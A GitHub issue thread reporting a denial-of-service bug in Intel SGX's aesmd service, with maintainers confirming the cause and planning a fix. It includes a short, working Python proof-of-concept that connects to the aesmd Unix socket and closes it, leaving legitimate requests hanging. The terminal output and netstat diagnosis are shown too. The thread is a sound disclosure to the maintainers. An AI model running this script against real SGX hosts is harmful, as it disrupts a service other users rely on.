### ISSUE TITLE
A bug that could be used to make a denial-of-service attack

### ISSUE THREAD

**Issue by 0xhwang** [01org/linux-sgx#101]
Let's reproduce the DoS attack with latest master:

**aesm-attack.py**
```py
#!/usr/bin/env python

import socket

if __name__ == "__main__":
    aesm_service = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    aesm_service.connect("\0sgx_aesm_socket_base" + "\0" * 87)
    aesm_service.close()
```

Run this script, then you will find, all normal requests send to `aesmd_service` are blocked, super easy, right?

```sh
huiwang@localhost:~/intel-sgx-issue$ ./aesm-attack.py
huiwang@localhost:~/intel-sgx-issue$ ./aesm-normal.py
send req to aesmd: req {
  signature: "XXXXXXXX"
  key: "YYYYYYYYYYYYY"
  attributes: "ZZZZZZZ"
  timeout: 1000
}
wait ret
# infinite wait here: "denial-of-service" happens
```

How could this happen?
```sh
huiwang@localhost:~/intel-sgx-issue$ netstat | grep aesm_socket
unix  2      [ ]         STREAM     CONNECTED     1154943  @sgx_aesm_socket_base
unix  3      [ ]         STREAM     CONNECTING    0        @sgx_aesm_socket_base
```
The connection opened by `aesm-attach.py` is still in `CONNECTED` status. If you read the source code, you can find `aesmd` is doing `epoll_wait` on this actually `closed` socket, which blocks the `aesmd` to handle new connections.

So the bug comes from that `aesmd` does not handle the client connection properly. I will send out a PR to fix this.

**Comment by llly** [comment]
You are right. aesm should handle closed socket and epoll_wait timeout properly.

**Comment by llly** [comment]
NonBlockingUnixCommunicationSocket.cpp is shared by client and server. The fix #102 works for server side but breaks client.

**Comment by 0xhwang** [comment]
Sorry to hear that, I'll take a look at the client. Thanks!

**Comment by llly** [comment]
I have root-caused this issue and will fix it very soon.

**Comment by 0xhwang** [comment]
Cool~ I'll close the PR and this issue when you send out the fix.
